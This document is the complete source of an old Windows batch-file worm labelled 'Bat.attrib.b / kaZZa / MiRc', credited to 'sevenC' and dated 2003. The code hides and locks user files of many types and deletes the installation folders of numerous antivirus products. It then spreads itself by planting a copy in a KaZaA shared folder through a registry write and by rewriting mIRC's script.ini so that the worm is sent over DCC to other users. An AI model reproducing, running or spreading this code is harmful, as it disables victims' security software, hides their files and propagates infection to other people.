:: Bat.attrib.b / kaZZa / MiRc
:: By sevenC
:: 3 Desember 2003
@ctty nul
@echo off
@for %%a in (C:\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\*.html) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.html) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.html) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.html) do attrib +h +s +r %%a
@for %%a in (C:\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.rtf) do attrib +h +s +r %%a
@if exist c:\progra~1\norton~1\*.* deltree/y c:\progra~1\norton~1\
@if exist c:\progra~1\norton~2\*.* deltree/y c:\progra~1\norton~2\
@if exist c:\progra~1\symant~1\*.* deltree/y c:\progra~1\symant~1\
@if exist c:\progra~1\common~1\symant~1\*.* deltree/y c:\progra~1\common~1\symant~1\
@if exist c:\progra~1\common~1\avpsha~1\avpbases\*.* deltree/y c:\progra~1\common~1\avpsha~1\avpbases\
@if exist c:\progra~1\common~1\avpsha~1\*.* deltree/y c:\progra~1\common~1\avpsha~1\
@if exist c:\progra~1\mcafee\viruss~1\*.* deltree/y c:\progra~1\mcafee\viruss~1\
@if exist c:\progra~1\mcafee\*.* deltree/y c:\progra~1\mcafee\
@if exist c:\progra~1\pandas~1\*.* deltree/y c:\progra~1\pandas~1\
@if exist c:\progra~1\trendm~1\*.* deltree/y c:\progra~1\trendm~1\
@if exist c:\progra~1\comman~1\*.* deltree/y c:\progra~1\comman~1\
@if exist c:\progra~1\zonela~1\*.* deltree/y c:\progra~1\zonela~1\
@if exist c:\progra~1\tinype~1\*.* deltree/y c:\progra~1\tinype~1\
@if exist c:\progra~1\kasper~1\*.* deltree/y c:\progra~1\kasper~1\
@if exist c:\progra~1\kasper~2\*.* deltree/y c:\progra~1\kasper~2\
@if exist c:\progra~1\trojan~1\*.* deltree/y c:\progra~1\trojan~1\
@if exist c:\progra~1\avpers~1\*.* deltree/y c:\progra~1\avpers~1\
@if exist c:\progra~1\grisoft\*.* deltree/y c:\progra~1\grisoft\
@if exist c:\progra~1\antivi~1\*.* deltree/y c:\progra~1\antivi~1\
@if exist c:\progra~1\quickh~1\*.* deltree/y c:\progra~1\quickh~1\
@if exist c:\progra~1\f-prot95\*.* deltree/y c:\progra~1\f-prot95\
@if exist c:\progra~1\fwin32\*.* deltree/y c:\progra~1\fwin32\
@if exist c:\progra~1\tbav\*.* deltree/y c:\progra~1\tbav\
@if exist c:\progra~1\findvi~1\*.* deltree/y c:\progra~1\findvi~1\
@if exist c:\findvi~1\*.* deltree/y c:\findvi~1\
@if exist c:\esafen\*.* deltree/y c:\esafen\
@if exist c:\f-macro\*.* deltree/y c:\f-macro\
@if exist c:\tbavw95\*.* deltree/y c:\tbavw95\
@if exist c:\tbav\*.* deltree/y c:\tbav\
@if exist c:\vs95\*.* deltree/y c:\vs95\
@if exist c:\antivi~1\*.* deltree/y c:\antivi~1\
@if exist c:\toolkit\findvi~1\*.* deltree/y c:\toolkit\findvi~1\
@if exist c:\pccill~1\*.* deltree/y c:\pccill~1\
copy %0 C:\regkey.vbs
echo.on error resume next > C:\regkey.vbs
echo set ws = CreateObject("wscript.shell") >> C:\regkey.vbs
echo ws.regwrite "HKLM\Software\KaZaA\Transfer\DlDir0","%windir%\KaZaA\" >> C:\regkey.vbs
cscript C:\regkey.vbs
del C:\regkey.vbs
md %windir%\KaZaA
copy %0 C:\pro\seven.bat
if exist C:\mirc\script.ini set mIRC=C:\mirc
if exist C:\mirc32\script.ini set mIRC=C:\mirc32
if exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc
if exist C:\progra~1\mirc32\script.ini set mIRC=C:\progra~1\mirc32
copy file.bat %mIRC%\seven.bat
echo [script] > %mIRC%\script.ini
echo n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick %mIRC%\seven.bat } >>%mIRC%\script.ini

:: Bat.attrib.b / kaZZa / miRc
:: By sevenC
:: 3 desember 2003